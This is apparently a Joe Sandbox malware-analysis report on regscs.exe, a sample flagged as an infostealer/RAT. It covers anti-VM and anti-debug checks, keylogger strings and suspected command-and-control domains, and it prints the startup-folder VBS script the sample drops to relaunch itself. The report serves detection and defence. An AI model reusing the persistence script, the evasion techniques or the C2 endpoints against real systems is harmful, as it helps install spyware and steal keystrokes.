            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: regscs.exeStatic file information: File size 1294848 > 1048576
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BDD18 push 004BDF04h; ret 0_2_004BDEFC
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BDD16 push 004BDF04h; ret 0_2_004BDEFC
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BDD8A push 004BDF04h; ret 0_2_004BDEFC
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BDF4C push 004BDF72h; ret 0_2_004BDF6A
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BDF0C push 004BDF38h; ret 0_2_004BDF30

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\regscs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbsJump to dropped file
            Source: C:\Users\user\Desktop\regscs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbsJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbsJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbsJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\regscs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\regscs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: regscs.exe, 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\regscs.exeRDTSC instruction interceptor: First address: 438426 second address: 438430 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 call dword ptr [004F0034h] 0x0000000a jmp dword ptr [74E51150h] 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 mov eax, dword ptr [eax+18h] 0x00000019 ret 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\regscs.exeRDTSC instruction interceptor: First address: 43843C second address: 438426 instructions: 0x00000000 rdtsc 0x00000002 sub eax, esi 0x00000004 xor edx, edx 0x00000006 sub esi, edi 0x00000008 div esi 0x0000000a cmp eax, 0Ah 0x0000000d jnc 00007F3478DE1DEDh 0x0000000f inc ebx 0x00000010 cmp ebx, 0Ah 0x00000013 jc 00007F3478DE1DB7h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory allocated: 2CC0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeWindow / User API: threadDelayed 6659Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeWindow / User API: threadDelayed 1177Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exe TID: 1260Thread sleep count: 1177 > 30Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\user\Desktop\regscs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\user\Desktop\regscs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\user\Desktop\regscs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\user\Desktop\regscs.exeLast function: Thread delayed
            Source: wscript.exe, 00000005.00000002.1925771889.0000028C2AB44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7
            Source: regscs.exe, 00000001.00000003.1827801488.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000003.1828124626.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000003.1828496559.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000003.1828246185.00000000005FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LocalSystem..Hyper-V Remote Desktop Virtualization Service>
            Source: regscs.exe, 00000001.00000003.1827801488.00000000005FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NT AUTHORITY\LocalService%%Hyper-V Time Synchronization Servicez
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(dh%SystemRoot%\system32\mswsock.dll
            Source: regscs.exe, 00000007.00000003.2049000117.000000000058A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange ServiceD
            Source: regscs.exe, 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: Cx</block><block><block></block></block><block></data></data><block>.bin\</date>%Y-%m-%d %I:%M:%S<date><data><title></title>{F1}{F2}{F3}{F4}{F5}{F6}{F7}{F8}{F9}{F10}{F11}{F12}{F13}{F14}{F15}{F16}{NUMPAD_0}{NUMPAD_1}{NUMPAD_2}{NUMPAD_3}{NUMPAD_4}{NUMPAD_5}{NUMPAD_6}{NUMPAD_7}{NUMPAD_8}{NUMPAD_9}{NUMPAD_MULTIPLY}{NUMPAD_ADD}{NUMPAD_SEPARATOR}{NUMPAD_SUBTRACT}{NUMPAD_DECIMAL}{NUMPAD_DIVIDE}{ENTER}{CTRL}&nbsp;{SHIFT}{CAPSLOCK}{ESC}{MENU}{HELP}{CLEAR}{TAB}{BACKSPACE}{PRTSCR}{SELECT}{EXECUTE}{SCROLL}{PAUSE}{INS}{HOME}{PAGEUP}{PAGEDOWN}{DEL}{END}{UP}{DOWN}{LEFT}{RIGHT}{NUMLOCK}KEYLOG: KEYLOG STEAM SENT: send_keylog_stream_data</block><block></block><block>kernel32.dllKernel32.dllNtQueryInformationProcessNTDLL.DLLSYSTEM\CurrentControlSet\Control\Terminal Server\GlassSessionIdKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMprl hyperv VBoxVBoxVBoxROOT\CIMV2SELECT * FROM Win32_VideoControllerCaptionHyper-VMicrosoft Basic Display AdapterVMWare%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%VirtualAlloc failed. Last error: %u
            Source: regscs.exe, 00000001.00000002.2935689636.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: regscs.exe, 00000007.00000003.2049000117.0000000000591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (YC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pteerLocalSystemHyper-V PowerShell Direct Servicey:May:Jun:June:J
            Source: regscs.exe, 00000007.00000002.2246380126.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\regscs.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess queried: DebugFlagsJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess queried: DebugObjectHandleJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess queried: DebugFlagsJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess queried: DebugObjectHandleJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMemory protected: page execute and read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: NULL target: C:\Users\user\Desktop\regscs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: NULL target: C:\Users\user\Desktop\regscs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: NULL target: C:\Users\user\Desktop\regscs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: NULL target: C:\Users\user\Desktop\regscs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe" Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe" Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.regscs.exe.29e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.regscs.exe.2a40000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.regscs.exe.2a40000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regscs.exe PID: 7068, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.regscs.exe.29e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.regscs.exe.2a40000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.regscs.exe.2a40000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regscs.exe PID: 7068, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            111
            Scripting
            111
            Process Injection
            1
            Masquerading
            OS Credential Dumping311
            Security Software Discovery
            Remote ServicesData from Local System1
            Non-Application Layer Protocol
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Registry Run Keys / Startup Folder
            2
            Registry Run Keys / Startup Folder
            13
            Virtualization/Sandbox Evasion
            LSASS Memory13
            Virtualization/Sandbox Evasion
            Remote Desktop ProtocolData from Removable Media1
            Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials112
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1535915 Sample: regscs.exe Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 25 oryadshow.wm01.to 2->25 27 sdns.se 2->27 29 ntp.se 2->29 41 Suricata IDS alerts for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 6 other signatures 2->47 8 regscs.exe 1 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 23 C:\Users\user\AppData\...\svcreg.exe.vbs, ASCII 8->23 dropped 49 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->49 51 Drops VBS files to the startup folder 8->51 53 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->53 57 2 other signatures 8->57 14 regscs.exe 12 8->14         started        55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->55 17 regscs.exe 1 12->17         started        signatures6 process7 dnsIp8 33 ee01439035b99fed4b57e5bd255d5faa.se 14->33 35 2aa4ccb27ab65b064eae52e993d5dbff.se 14->35 37 ntp.se 194.58.200.20, 123, 49520, 49827 NTP-SEAnycastedNTPservicesfromNetnodIXPsSE Sweden 14->37 39 Maps a DLL or memory area into another process 17->39 20 regscs.exe 17->20         started        signatures9 process10 dnsIp11 31 2aa4ccb27ab65b064eae52e993d5dbff.se 20->31

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            regscs.exe79%ReversingLabsWin32.Infostealer.Pony
            regscs.exe100%AviraHEUR/AGEN.1331242
            regscs.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            ntp.se
            194.58.200.20
            truefalse
              unknown
              sdns.se
              185.141.152.26
              truefalse
                unknown
                ee01439035b99fed4b57e5bd255d5faa.se
                unknown
                unknowntrue
                  unknown
                  oryadshow.wm01.to
                  unknown
                  unknowntrue
                    unknown
                    2aa4ccb27ab65b064eae52e993d5dbff.se
                    unknown
                    unknowntrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://0/recv5.phpregscs.exe, 00000001.00000002.2935689636.0000000000656000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://0/recv5.phpicregscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://oryadshow.wm01.to/regscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://oryadshow.wm01.to/Xregscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://oryadshow.wm01.to/recv5.phpregscs.exe, 00000001.00000002.2935689636.0000000000656000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.0000000000620000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://oryadshow.wm01.to/recv5.phpppregscs.exe, 00000001.00000002.2935689636.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://0/recv5.phporegscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://0/recv5.php3regscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://0.0.0.0/recv5.phpregscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        194.58.200.20
                                        ntp.seSweden
                                        57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1535915
                                        Start date and time:2024-10-17 12:35:06 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 4m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:regscs.exe
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winEXE@8/1@55/1
                                        EGA Information:
                                        • Successful, ratio: 33.3%
                                        HCA Information:
                                        • Successful, ratio: 93%
                                        • Number of executed functions: 44
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target regscs.exe, PID 1696 because there are no executed function
                                        • Execution Graph export aborted for target regscs.exe, PID 6404 because there are no executed function
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: regscs.exe
                                        TimeTypeDescription
                                        06:36:19API Interceptor2x Sleep call for process: regscs.exe modified
                                        11:36:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        194.58.200.20PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                          OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                            NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                              STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                  REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                    allcrhfJER.exeGet hashmaliciousWebMonitor RATBrowse
                                                      HSBC_PAYMENT_COPY.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                        FILE_2932NH_9923.exeGet hashmaliciousWebMonitor RATBrowse
                                                          DHL_PACKAGE_HD98232.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ntp.sePREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            allcrhfJER.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            HSBC_PAYMENT_COPY.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            FILE_2932NH_9923.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            DHL_PACKAGE_HD98232.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            sdns.seCameraCaptureUI.exeGet hashmaliciousRemcos, WebMonitor RATBrowse
                                                            • 185.141.152.26
                                                            PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            2r7YWg9WKr.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            allcrhfJER.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            HSBC_PAYMENT_COPY.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 185.243.215.214
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            NTP-SEAnycastedNTPservicesfromNetnodIXPsSEPREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            allcrhfJER.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            HSBC_PAYMENT_COPY.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            FILE_2932NH_9923.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            DHL_PACKAGE_HD98232.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                            • 194.58.200.20
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\regscs.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):5.021988615115362
                                                            Encrypted:false
                                                            SSDEEP:3:RUR8FgAExv22WtgpCdnydoNt+WfWXsHH2:RL3YviSs8doNwv82
                                                            MD5:BC91062FC686E3A1D3627889ADB6915F
                                                            SHA1:3AABCFF3250E2BEF0063B6F9D35FB9E8FEB36C96
                                                            SHA-256:A2F37E5484E38EE589569C917DC28197E2C0CA46D6B3A616FEEB62CC78685F47
                                                            SHA-512:0545011EF11DCA71BC058527C8EF40E706EF015B190F956B9CC2E80AE53650212B4C941498C85E91088A9BCF9FFB41505F484796409F389AB76CC47D8FE253BE
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:sEt KYdaDJ = CreaTeobjeCt("wSCrIpT.sHELl")..kydaDj.RUN """C:\Users\user\Desktop\regscs.exe"""...
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.215312083908525
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.66%
                                                            • Win32 Executable Delphi generic (14689/80) 0.15%
                                                            • Windows Screen Saver (13104/52) 0.13%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            File name:regscs.exe
                                                            File size:1'294'848 bytes
                                                            MD5:fe4001f3584462a292bff67b021a7337
                                                            SHA1:5543207ebed4d7b50a350ece848c103dc7805f03
                                                            SHA256:9fbe0f24d1f2b9145043e85fe3b7dcfe3f5c76a2d4910487992d90ada0c7c520
                                                            SHA512:a0cbabb0abba6fc8f3c1d1195cf0f6ccefb939713a338880dbcd86bebc4b346bcae0cc723952be57e672288e02c48c427ec677b70b1f8d324ce5d93e425f10ee
